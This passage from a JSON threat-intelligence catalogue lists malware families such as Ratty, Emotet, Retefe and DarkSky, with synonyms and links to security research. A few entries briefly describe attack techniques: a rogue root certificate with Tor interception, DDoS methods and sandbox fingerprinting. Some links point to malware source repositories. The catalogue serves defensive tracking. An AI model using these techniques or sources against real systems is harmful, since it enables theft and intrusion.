"uuid": "da032a95-b02a-4af2-b563-69f686653af4",
"value": "Ratty",
"description": "Ratty is an open source Java RAT, made available on GitHub and promoted heavily on HackForums. At some point in 2016 / 2017 the original author deleted his repository, but several clones exist.",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://github.com/shotskeber/Ratty"
]
}
},
{
"uuid": "b127028b-ecb1-434b-abea-e4df3ca458b9",
"value": "Terminator RAT",
"description": "",
"meta": {
"synonyms": [
"Fakem RAT"
],
"type": [],
"refs": [
"https://malware.lu/assets/files/articles/RAP002_APT1_Technical_backstage.1.0.pdf",
"http://contagiodump.blogspot.com/2012/06/rat-samples-from-syrian-targeted.html",
"https://www.welivesecurity.com/wp-content/uploads/2014/01/Advanced-Persistent-Threats.pdf",
"https://documents.trendmicro.com/assets/wp/wp-fakem-rat.pdf"
]
}
},
{
"uuid": "93b1c63a-4a34-44fd-805b-0a3470ff7e6a",
"value": "Connic",
"description": "",
"meta": {
"synonyms": [
"SpyBanker"
],
"type": [],
"refs": [
"https://www.welivesecurity.com/2017/12/11/banking-malware-targets-polish-banks/"
]
}
},
{
"uuid": "87abb59d-0012-4d45-9e75-136372b25bf8",
"value": "Mikoponi",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": []
}
},
{
"uuid": "80d7d229-b3a7-4205-8304-f7b18bda129f",
"value": "FlexNet",
"description": "",
"meta": {
"synonyms": [
"gugi"
],
"type": [],
"refs": [
"https://twitter.com/LukasStefanko/status/886849558143279104"
]
}
},
{
"uuid": "3477a25d-e04b-475e-8330-39f66c10cc01",
"value": "Elise",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.accenture.com/t20180127T003755Z__w__/us-en/_acnmedia/PDF-46/Accenture-Security-Dragonfish-Threat-Analysis.pdf",
"https://researchcenter.paloaltonetworks.com/2016/02/emissary-trojan-changelog-did-operation-lotus-blossom-cause-it-to-evolve/",
"https://securelist.com/blog/research/70726/the-spring-dragon-apt/",
"https://www.joesecurity.org/blog/8409877569366580427"
]
}
},
{
"uuid": "9d4fc43c-28a1-45ea-ac2c-8d53bdce118b",
"value": "Heriplor",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.symantec.com/connect/blogs/dragonfly-western-energy-sector-targeted-sophisticated-attack-group"
]
}
},
{
"uuid": "a8f167a8-30b9-4953-8eb6-247f0d046d32",
"value": "XRat",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://blog.lookout.com/xrat-mobile-threat"
]
}
},
{
"uuid": "8a4eb0ca-7175-4e69-b8d2-fd7a724de67b",
"value": "Roseam",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"http://researchcenter.paloaltonetworks.com/2016/05/unit42-new-wekby-attacks-use-dns-requests-as-command-and-control-mechanism/"
]
}
},
{
"uuid": "2ee0122a-701d-487d-9ac1-7d91e4f99d78",
"value": "August Stealer",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.proofpoint.com/us/threat-insight/post/august-in-december-new-information-stealer-hits-the-scene",
"https://hazmalware.blogspot.de/2016/12/analysis-of-august-stealer-malware.html"
]
}
},
{
"uuid": "52932caa-2fac-4eeb-88de-b3e143db010e",
"value": "PvzOut",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.cylance.com/content/dam/cylance/pages/operation-cleaver/Cylance_Operation_Cleaver_Report.pdf"
]
}
},
{
"uuid": "8945d785-9d43-49ee-b210-4adeb8a24ab9",
"value": "Cutlet",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"http://www.vkremez.com/2017/12/lets-learn-cutlet-atm-malware-internals.html"
]
}
},
{
"uuid": "e7852eb9-9de9-43d3-9f7e-3821f3b2bf41",
"value": "Qarallax RAT",
"description": "According to SpiderLabs, in May 2015 the \"company\" Quaverse offered a RAT known as Quaverse RAT or QRAT. Around May 2016, this QRAT evolved into another RAT which became known as Qarallax RAT, because its C2 is at qarallax.com. Quaverse also offers a service to encrypt Java payloads (Qrypter), and thus qrypted payloads are sometimes confused with Quaverse RATs (QRAT / Qarallax RAT).",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"http://www.certego.net/en/news/nearly-undetectable-qarallax-rat-spreading-via-spam/",
"https://labsblog.f-secure.com/2016/06/07/qarallax-rat-spying-on-us-visa-applicants/"
]
}
},
{
"uuid": "2f11eb73-4faa-48c5-b217-11e139962c6f",
"value": "Boaxxe",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.welivesecurity.com/2014/03/18/operation-windigo-the-vivisection-of-a-large-linux-server-side-credential-stealing-malware-campaign/"
]
}
},
{
"uuid": "6f9ed0b0-63c8-4f51-8425-17cfc2b3c12e",
"value": "shareip",
"description": "",
"meta": {
"synonyms": [
"remotecmd"
],
"type": [],
"refs": [
"https://www.symantec.com/connect/blogs/buckeye-cyberespionage-group-shifts-gaze-us-hong-kong"
]
}
},
{
"uuid": "2e99f27c-6791-4695-b88b-de4d4cbda8d6",
"value": "Virut",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://blog.malwarebytes.com/threat-analysis/2018/03/blast-from-the-past-stowaway-virut-delivered-with-chinese-ddos-bot/",
"https://www.theregister.co.uk/2018/01/10/taiwanese_police_malware/"
]
}
},
{
"uuid": "2269d37b-87e9-460d-b878-b74a2f4c3537",
"value": "KopiLuwak",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.proofpoint.com/us/threat-insight/post/turla-apt-actor-refreshes-kopiluwak-javascript-backdoor-use-g20-themed-attack",
"https://securelist.com/blog/research/77429/kopiluwak-a-new-javascript-payload-from-turla/"
]
}
},
{
"uuid": "9240ce4f-2c48-4e37-baaf-b8b9050c58f5",
"value": "Bahamut",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.bellingcat.com/news/mena/2017/06/12/bahamut-pursuing-cyber-espionage-actor-middle-east/",
"https://www.bellingcat.com/resources/case-studies/2017/10/27/bahamut-revisited-cyber-espionage-middle-east-south-asia/"
]
}
},
{
"uuid": "606b160a-5180-4255-a1db-b2b9e8a52e95",
"value": "Aveo",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"http://researchcenter.paloaltonetworks.com/2016/08/unit42-aveo-malware-family-targets-japanese-speaking-users/"
]
}
},
{
"uuid": "bb836040-c161-4932-8f89-bc2ca2e8c1c0",
"value": "Fobber",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://blog.malwarebytes.com/threat-analysis/2015/06/elusive-hanjuan-ek-caught-in-new-malvertising-campaign/",
"http://www.govcert.admin.ch/downloads/whitepapers/govcertch_fobber_analysis.pdf",
"https://www.govcert.admin.ch/blog/12/analysing-a-new-ebanking-trojan-called-fobber",
"http://blog.wizche.ch/fobber/malware/analysis/2015/08/10/fobber-encryption.html",
"http://byte-atlas.blogspot.ch/2015/08/knowledge-fragment-unwrapping-fobber.html"
]
}
},
{
"uuid": "519d07f5-bea3-4360-8aa5-f9fcdb79cb52",
"value": "Powersniff",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://lokalhost.pl/gozi_tree.txt"
]
}
},
{
"uuid": "5ce7906e-b1fd-4860-b3e2-ac9c72033428",
"value": "Nemim",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://securelist.com/files/2014/11/darkhotelappendixindicators_kl.pdf"
]
}
},
{
"uuid": "d99c0a47-9d61-4d92-86ec-86a87b060d76",
"value": "Svpeng",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://securelist.com/a-new-era-in-mobile-banking-trojans/79198/"
]
}
},
{
"uuid": "00e1373c-fddf-4b06-9770-e980cc0ada6b",
"value": "NanoLocker",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": []
}
},
{
"uuid": "f9f37707-36cf-4ad0-88e0-86f47cbe0ed6",
"value": "WebC2-Head",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.scribd.com/document/349629589/Appendix-C-Digital-The-Malware-Arsenal-pdf"
]
}
},
{
"uuid": "2173605b-bf44-4c76-b75a-09c53bb322d6",
"value": "Keydnap",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://objective-see.com/blog/blog_0x16.html",
"http://www.welivesecurity.com/2016/07/06/new-osxkeydnap-malware-hungry-credentials/",
"https://github.com/eset/malware-ioc/tree/master/keydnap"
]
}
},
{
"uuid": "30a22cdb-9393-460b-86ae-08d97c626155",
"value": "Saphyra",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://securityintelligence.com/dissecting-hacktivists-ddos-tool-saphyra-revealed/",
"https://www.youtube.com/watch?v=Bk-utzAlYFI"
]
}
},
{
"uuid": "d29eb927-d53d-4af2-b6ce-17b3a1b34fe7",
"value": "Geodo",
"description": "",
"meta": {
"synonyms": [
"Emotet",
"Heodo"
],
"type": [],
"refs": [
"http://blog.trendmicro.com/trendlabs-security-intelligence/emotet-returns-starts-spreading-via-spam-botnet/",
"https://cloudblogs.microsoft.com/microsoftsecure/2017/11/06/mitigating-and-eliminating-info-stealing-qakbot-and-emotet-in-corporate-networks/?source=mmpc",
"https://www.cert.pl/en/news/single/analysis-of-emotet-v4/",
"https://www.fidelissecurity.com/threatgeek/2017/07/emotet-takes-wing-spreader",
"https://securelist.com/analysis/publications/69560/the-banking-trojan-emotet-detailed-analysis/",
"https://feodotracker.abuse.ch/?filter=version_e",
"https://www.gdata.de/blog/2017/10/30110-emotet-beutet-outlook-aus",
"https://blog.trendmicro.com/trendlabs-security-intelligence/new-emotet-hijacks-windows-api-evades-sandbox-analysis/",
"http://blog.fortinet.com/2017/05/03/deep-analysis-of-new-emotet-variant-part-1"
]
}
},
{
"uuid": "9fbb5822-1660-4651-9f57-b6f83a881786",
"value": "GovRAT",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.yumpu.com/en/document/view/55930175/govrat-v20"
]
}
},
{
"uuid": "b50408c3-6676-4d3f-8a97-9114c215b67a",
"value": "Molerat Loader",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"http://www.clearskysec.com/iec/",
"https://kc.mcafee.com/resources/sites/MCAFEE/content/live/PRODUCT_DOCUMENTATION/26000/PD26760/en_US/McAfee_Labs_Threat_Advisory_GazaCybergang.pdf"
]
}
},
{
"uuid": "4f3ad937-bf2f-40cb-9695-a2bedfd41bfa",
"value": "Snifula",
"description": "",
"meta": {
"synonyms": [
"Ursnif"
],
"type": [],
"refs": [
"https://www.circl.lu/assets/files/tr-13/tr-13-snifula-analysis-report-v1.3.pdf"
]
}
},
{
"uuid": "42e23d17-8f1b-43c9-bc76-e3cf098b5c52",
"value": "woody",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.sans.org/reading-room/whitepapers/malicious/detailed-analysis-advanced-persistent-threat-malware-33814"
]
}
},
{
"uuid": "80987ce7-7eb7-4e55-95f8-5c7a9441acab",
"value": "Hi-Zor RAT",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.fidelissecurity.com/threatgeek/2016/01/introducing-hi-zor-rat"
]
}
},
{
"uuid": "94466a80-964f-467e-b4b3-0e1375174464",
"value": "Hworm",
"description": "",
"meta": {
"synonyms": [
"houdini"
],
"type": [],
"refs": [
"http://researchcenter.paloaltonetworks.com/2016/10/unit42-houdinis-magic-reappearance/?adbsc=social67221546&adbid=790972447373668352&adbpl=tw&adbpr=4487645412"
]
}
},
{
"uuid": "a180afcc-d42d-4600-b70f-af27aaf851b7",
"value": "Anel",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://blog.trendmicro.com/trendlabs-security-intelligence/chessmaster-adds-updated-tools-to-its-arsenal/"
]
}
},
{
"uuid": "a61fc694-a88a-484d-a648-db35b49932fd",
"value": "Crimson",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.amnesty.org/download/Documents/ASA3383662018ENGLISH.PDF"
]
}
},
{
"uuid": "37f4fe10-96e4-4b3e-9159-80023270d3a6",
"value": "Retefe",
"description": "The Android app used by Retefe is an SMS stealer that forwards mTAN codes to the threat actor. In addition, a bank logo is added to the specific Android app to trick users into thinking it is a legitimate app. Moreover, if the visitor is not a genuine target, the download link does not serve the malicious APK but the real 'Signal Private Messenger' app, so that phone is not infected. This entry covers the Android component; the Windows banking trojan is covered by the separate Retefe entry (synonyms Werdlod, Tsukuba).",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"http://blog.angelalonso.es/2015/10/reversing-c2c-http-emmental.html",
"https://www.govcert.admin.ch/blog/33/the-retefe-saga",
"http://blog.angelalonso.es/2017/02/hunting-retefe-with-splunk-some24.html",
"http://maldr0id.blogspot.ch/2014/09/android-malware-based-on-sms-encryption.html",
"http://blog.angelalonso.es/2015/11/reversing-sms-c-protocol-of-emmental.html",
"http://blog.dornea.nu/2014/07/07/disect-android-apks-like-a-pro-static-code-analysis/"
]
}
},
{
"uuid": "f92b5355-f398-4f09-8bcc-e06df6fe51a0",
"value": "FlashBack",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"http://contagiodump.blogspot.com/2012/04/osxflashbacko-sample-some-domains.html",
"https://www.alienvault.com/blogs/labs-research/os-x-malware-samples-analyzed",
"http://contagiodump.blogspot.com/2012/04/osxflashbackk-sample-mac-os-malware.html"
]
}
},
{
"uuid": "6b0030bc-6e45-43b0-9175-15fe8fbd0942",
"value": "FakeTC",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"http://www.welivesecurity.com/2015/07/30/operation-potao-express/"
]
}
},
{
"uuid": "f566d597-d0c4-4932-b738-ac5774eedb7a",
"value": "Matsnu",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://blog.checkpoint.com/wp-content/uploads/2015/07/matsnu-malwareid-technical-brief.pdf"
]
}
},
{
"uuid": "da92c927-9b31-48aa-854a-8ed49a29565b",
"value": "Sierra(Alfa,Bravo, ...)",
"description": "",
"meta": {
"synonyms": [
"Destover"
],
"type": [],
"refs": [
"https://www.symantec.com/connect/blogs/wannacry-ransomware-attacks-show-strong-links-lazarus-group",
"https://securingtomorrow.mcafee.com/mcafee-labs/analyzing-operation-ghostsecret-attack-seeks-to-steal-data-worldwide/"
]
}
},
{
"uuid": "3b746f77-214b-44f9-9ef2-0ae6b52561d6",
"value": "IISniff",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.trustwave.com/Resources/SpiderLabs-Blog/The-Curious-Case-of-the-Malicious-IIS-Module/"
]
}
},
{
"uuid": "6ad84f52-0025-4a9d-861a-65c870f47988",
"value": "Stuxnet",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"http://artemonsecurity.blogspot.de/2017/04/stuxnet-drivers-detailed-analysis.html"
]
}
},
{
"uuid": "5eee35b6-bd21-4b67-b198-e9320fcf2c88",
"value": "Tinba",
"description": "",
"meta": {
"synonyms": [
"Zusy",
"Illi",
"TinyBanker"
],
"type": [],
"refs": [
"https://labsblog.f-secure.com/2016/01/18/analyzing-tinba-configuration-data/",
"http://www.theregister.co.uk/2012/06/04/small_banking_trojan/",
"https://securityintelligence.com/tinba-trojan-sets-its-sights-on-romania/",
"https://securityblog.switch.ch/2015/06/18/so-long-and-thanks-for-all-the-domains/",
"http://contagiodump.blogspot.com/2012/06/amazon.html",
"http://www.trendmicro.com/cloud-content/us/pdfs/security-intelligence/white-papers/wp_w32-tinba-tinybanker.pdf",
"https://www.zscaler.com/blogs/research/look-recent-tinba-banking-trojan-variant",
"http://garage4hackers.com/entry.php?b=3086",
"http://stopmalvertising.com/malware-reports/mini-analysis-of-the-tinybanker-tinba.html",
"http://securityintelligence.com/tinba-malware-reloaded-and-attacking-banks-around-the-world/"
]
}
},
{
"uuid": "0092b005-b032-4e34-9c7e-7dd0e71a85fb",
"value": "GrabBot",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"http://blog.fortinet.com/2017/03/17/grabbot-is-back-to-nab-your-data"
]
}
},
{
"uuid": "a5eb921e-17db-46de-a907-09f9ad05a7d7",
"value": "Duuzer",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.symantec.com/connect/blogs/wannacry-ransomware-attacks-show-strong-links-lazarus-group"
]
}
},
{
"uuid": "98d375cb-f940-4bc7-a61e-f47bdcdc48e2",
"value": "MyloBot",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.deepinstinct.com/2018/06/20/meet-mylobot-a-new-highly-sophisticated-never-seen-before-botnet-thats-out-in-the-wild/"
]
}
},
{
"uuid": "a7489029-21d4-44c9-850a-8f656a98cb22",
"value": "Eye Pyramid",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"http://blog.talosintel.com/2017/01/Eye-Pyramid.html",
"https://securelist.com/blog/incidents/77098/the-eyepyramid-attacks/"
]
}
},
{
"uuid": "1aecd6eb-80e2-4598-8504-d93f69c7a8f0",
"value": "DarkPulsar",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://labs.nettitude.com/blog/a-quick-analysis-of-the-latest-shadow-brokers-dump/"
]
}
},
{
"uuid": "c12f1363-2bc8-4ffb-8f31-cbb5f85e0ffe",
"value": "GalaxyLoader",
"description": "GalaxyLoader is a simple .NET loader. Its name stems from the .pdb path and the function naming.\r\n\r\nIt seems to make use of iplogger.com for tracking (a network indicator worth hunting for).\r\nIt uses WMI to fingerprint the system, likely for sandbox/analysis-environment detection, with the following queries:\r\n- IWbemServices::ExecQuery - SELECT * FROM Win32_Processor\r\n- IWbemServices::ExecQuery - select * from Win32_VideoController\r\n- IWbemServices::ExecQuery - SELECT * FROM AntivirusProduct\r\n",
"meta": {
"synonyms": [],
"type": [],
"refs": []
}
},
{
"uuid": "6df9bbd4-ab32-4d09-afdb-97eed274520a",
"value": "StarsyPound",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.scribd.com/document/349629589/Appendix-C-Digital-The-Malware-Arsenal-pdf"
]
}
},
{
"uuid": "bd3468e4-5e00-46e6-a884-6eda1b246394",
"value": "Moure",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": []
}
},
{
"uuid": "910d3c78-1a9e-4600-a3ea-4aa5563f0f13",
"value": "MacDownloader",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://iranthreats.github.io/resources/macdownloader-macos-malware/"
]
}
},
{
"uuid": "27bab2fb-d324-42c2-9df3-669bb87c3989",
"value": "ISR Stealer",
"description": "ISR Stealer is a modified version of the Hackhound Stealer. It is written in VB and often comes in a .NET wrapper.\r\nISR Stealer makes use of two NirSoft tools: Mail PassView and WebBrowserPassView (legitimate password-recovery utilities abused to harvest mail-client and browser credentials).\r\n\r\nNotably, it uses a hard-coded User-Agent string in its HTTP traffic, \"HardCore Software For : Public\", which makes a useful network detection indicator.",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://securingtomorrow.mcafee.com/mcafee-labs/phishing-attacks-employ-old-effective-password-stealer/"
]
}
},
{
"uuid": "32984744-c0f9-43f7-bfca-c3276248a4fa",
"value": "DoublePulsar",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://countercept.com/our-thinking/doublepulsar-usermode-analysis-generic-reflective-dll-loader/",
"https://github.com/countercept/doublepulsar-c2-traffic-decryptor",
"https://countercept.com/our-thinking/analyzing-the-doublepulsar-kernel-dll-injection-technique/",
"https://labs.nettitude.com/blog/a-quick-analysis-of-the-latest-shadow-brokers-dump/"
]
}
},
{
"uuid": "cad1d6db-3a6c-4d67-8f6e-627d8a168d6a",
"value": "BBSRAT",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://researchcenter.paloaltonetworks.com/2016/03/digital-quartermaster-scenario-demonstrated-in-attacks-against-the-mongolian-government/"
]
}
},
{
"uuid": "fca8c5e0-4fef-408c-bcd7-9826271e8e5d",
"value": "CenterPOS",
"description": "",
"meta": {
"synonyms": [
"cerebrus"
],
"type": [],
"refs": [
"https://www.fireeye.com/blog/threat-research/2016/01/centerpos_an_evolvi.html"
]
}
},
{
"uuid": "24fabbe0-27a2-4c93-a6a6-c14767efaa25",
"value": "Thanatos",
"description": "",
"meta": {
"synonyms": [
"Alphabot"
],
"type": [],
"refs": [
"https://www.proofpoint.com//us/threat-insight/post/Death-Comes-Calling-Thanatos-Alphabot-Trojan-Hits-Market"
]
}
},
{
"uuid": "cc5abb0c-7f33-4a82-a92e-0070fd602ba5",
"value": "DtBackdoor",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": []
}
},
{
"uuid": "eaf0afc1-de01-450f-86a1-12a93a3db256",
"value": "FlexiSpy",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.randhome.io/blog/2017/04/23/lets-talk-about-flexispy/"
]
}
},
{
"uuid": "99a10948-d7ba-4ad0-b73c-c7762143a193",
"value": "SNS Locker",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": []
}
},
{
"uuid": "5350bf3a-26b0-49fb-a0b8-dd68933ea78c",
"value": "WebC2-Rave",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.scribd.com/document/349629589/Appendix-C-Digital-The-Malware-Arsenal-pdf"
]
}
},
{
"uuid": "d8305201-9fec-4e6b-9eec-7ebb756364e2",
"value": "OddJob",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": []
}
},
{
"uuid": "5ba66415-b482-44ff-8dfa-809329e0e074",
"value": "GROK",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://securelist.com/files/2015/02/Equation_group_questions_and_answers.pdf"
]
}
},
{
"uuid": "3bb8052e-8ed2-48e3-a2cf-7358bae8c6b5",
"value": "NETEAGLE",
"description": "",
"meta": {
"synonyms": [
"ScoutEagle"
],
"type": [],
"refs": [
"https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf"
]
}
},
{
"uuid": "2a4cacb7-80a1-417e-8b9c-54b4089f35d9",
"value": "Enfal",
"description": "",
"meta": {
"synonyms": [
"Lurid"
],
"type": [],
"refs": [
"http://la.trendmicro.com/media/misc/lurid-downloader-enfal-report-en.pdf",
"https://www.bsk-consulting.de/2015/10/17/how-to-write-simple-but-sound-yara-rules-part-2/",
"https://researchcenter.paloaltonetworks.com/2015/05/cmstar-downloader-lurid-and-enfals-new-cousin/"
]
}
},
{
"uuid": "2ae57534-6aac-4025-8d93-888dab112b45",
"value": "Sys10",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://securelist.com/files/2015/05/TheNaikonAPT-MsnMM1.pdf",
"https://securelist.com/analysis/publications/69953/the-naikon-apt/",
"https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf"
]
}
},
{
"uuid": "ffd74637-b518-4622-939b-c0669a81f3a9",
"value": "Synth Loader",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": []
}
},
{
"uuid": "8465177f-16c8-47fc-a4c8-f4c0409fe460",
"value": "MoonWind",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"http://researchcenter.paloaltonetworks.com/2017/03/unit42-trochilus-rat-new-moonwind-rat-used-attack-thai-utility-organizations/"
]
}
},
{
"uuid": "92a65c89-acc3-4ee7-8db0-f0ea293ed12d",
"value": "Schneiken",
"description": "Schneiken is a VBS 'double-dropper': it carries two RATs embedded in its code (Dunihi and Ratty) and drops both. The entire script is Base64 encoded.",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://engineering.salesforce.com/malware-analysis-new-trojan-double-dropper-5ed0a943adb",
"https://github.com/vithakur/schneiken"
]
}
},
{
"uuid": "fe6134aa-6588-4619-8447-57a44eb8b24c",
"value": "Lazarus ELF Backdoor",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://securingtomorrow.mcafee.com/mcafee-labs/android-malware-appears-linked-to-lazarus-cybercrime-group/#sf174581990"
]
}
},
{
"uuid": "101c2c0e-c082-4b5a-b820-2da789e839d9",
"value": "Neuron",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.ncsc.gov.uk/alerts/turla-group-malware"
]
}
},
{
"uuid": "7078d273-8a2d-477a-b6d9-7313e22d9ad7",
"value": "ZoxPNG",
"description": "",
"meta": {
"synonyms": [
"gresim"
],
"type": [],
"refs": [
"http://www.novetta.com/wp-content/uploads/2014/11/ZoxPNG.pdf"
]
}
},
{
"uuid": "3572d725-bf13-43ef-9511-bdbb7692ab06",
"value": "Arik Keylogger",
"description": "",
"meta": {
"synonyms": [
"Aaron Keylogger"
],
"type": [],
"refs": [
"http://remote-keylogger.net/",
"https://www.invincea.com/2016/09/crimeware-as-a-service-goes-mainstream/"
]
}
},
{
"uuid": "3e072464-6fa6-4977-9b64-08f86d1062fc",
"value": "Bitsran",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"http://baesystemsai.blogspot.de/2017/10/taiwan-heist-lazarus-tools.html"
]
}
},
{
"uuid": "fa3d196b-b757-49b7-a06d-77c77ac151c4",
"value": "WebMonitor RAT",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://researchcenter.paloaltonetworks.com/2018/04/unit42-say-cheese-webmonitor-rat-comes-c2-service-c2aas/"
]
}
},
{
"uuid": "e09d8dd6-6857-4607-a0ba-9c8d2a66083b",
"value": "ISMDoor",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"http://www.clearskysec.com/greenbug/",
"https://www.symantec.com/connect/blogs/greenbug-cyberespionage-group-targeting-middle-east-possible-links-shamoon"
]
}
},
{
"uuid": "22ef1e56-7778-41d1-9b2b-737aa5bf9777",
"value": "Retefe",
"description": "Retefe is a Windows banking trojan that can also download and install additional malware onto the system using Windows PowerShell. Its primary functionality is to assist the attacker in stealing credentials for online banking websites; it is typically targeted against Swiss banks. The malware binary itself is primarily a dropper for a JavaScript file, which builds a VBA file that in turn loads multiple tools onto the host, including 7zip and Tor. The VBA installs a new root certificate and then forwards all traffic via Tor to an attacker-controlled host, effectively placing the attacker in a man-in-the-middle position on TLS connections: because the victim's system trusts the injected root certificate, the attacker's host can present certificates for the targeted banking sites without triggering browser warnings. The Android SMS-stealer component of Retefe is described in a separate Retefe entry.",
"meta": {
"synonyms": [
"Werdlod",
"Tsukuba"
],
"type": [],
"refs": [
"https://github.com/cocaman/retefe",
"https://researchcenter.paloaltonetworks.com/2015/08/retefe-banking-trojan-targets-sweden-switzerland-and-japan/",
"https://www.govcert.admin.ch/blog/33/the-retefe-saga",
"https://threatpost.com/eternalblue-exploit-used-in-retefe-banking-trojan-campaign/128103/"
]
}
},
{
"uuid": "606f778a-8b99-4880-8da8-b923651d627b",
"value": "PowerRatankba",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.riskiq.com/blog/labs/lazarus-group-cryptocurrency/",
"https://blog.trendmicro.com/trendlabs-security-intelligence/lazarus-campaign-targeting-cryptocurrencies-reveals-remote-controller-tool-evolved-ratankba/",
"https://www.proofpoint.com/sites/default/files/pfpt-us-wp-north-korea-bitten-by-bitcoin-bug.pdf"
]
}
},
{
"uuid": "4a5f2088-18cb-426a-92e2-1eb752c294c0",
"value": "Zebrocy (AutoIT)",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.welivesecurity.com/2018/04/24/sednit-update-analysis-zebrocy/"
]
}
},
{
"uuid": "d5f2e3c4-adf4-4156-98b1-b207f70522bb",
"value": "Darksky",
"description": "DarkSky is a botnet that is capable of downloading malware, conducting a number of network and application-layer distributed denial-of-service (DDoS) attacks, and detecting and evading security controls, such as sandboxes and virtual machines. It is advertised for sale on the dark web for $20. Much of the malware that DarkSky has available to download onto targeted systems is associated with cryptocurrency-mining activity. The DDoS attacks that DarkSky can perform include DNS amplification attacks, TCP (SYN) flood, UDP flood, and HTTP flood. The botnet can also perform a check to determine whether or not the DDoS attack succeeded and turn infected systems into a SOCKS/HTTP proxy to route traffic to a remote server.",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"http://telegra.ph/Analiz-botneta-DarkSky-12-30",
"https://blog.radware.com/security/2018/02/darksky-botnet/",
"https://github.com/ims0rry/DarkSky-botnet"
]
}
},
{
"uuid": "3a26ee44-3224-48f3-aefb-3978c972d928",
"value": "NetTraveler",
"description": "",
"meta": {
"synonyms": [
"TravNet"
],
"type": [],
"refs": [
"https://www.proofpoint.com/us/threat-insight/post/nettraveler-apt-targets-russian-european-interests",
"https://cdn.securelist.com/files/2014/07/kaspersky-the-net-traveler-part1-final.pdf"
]
}
},
{
"uuid": "38b38f8c-944d-4062-bf35-561e8a81c8d2",
"value": "Crypt0l0cker",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"http://blog.talosintelligence.com/2017/08/first-look-crypt0l0cker.html"
]
}
},
{
"uuid": "aa445513-9616-4f61-a72d-7aff4a10572b",
"value": "Empire Downloader",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://twitter.com/thor_scanner/status/992036762515050496"
]
}
},
{
"uuid": "83c3aacc-4d13-4ce2-aced-f11b03f12efe",
"value": "win.flusihoc",
"description": "Available since 2015, Flusihoc is a versatile C++ malware capable of a variety of DDoS attacks as directed by a command-and-control (C2) server. Flusihoc communicates with its C2 over HTTP in plaintext, i.e. without encryption, so its C2 traffic is directly observable in network captures.",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.arbornetworks.com/blog/asert/the-flusihoc-dynasty-a-long-standing-ddos-botnet/"
]
}
},
{
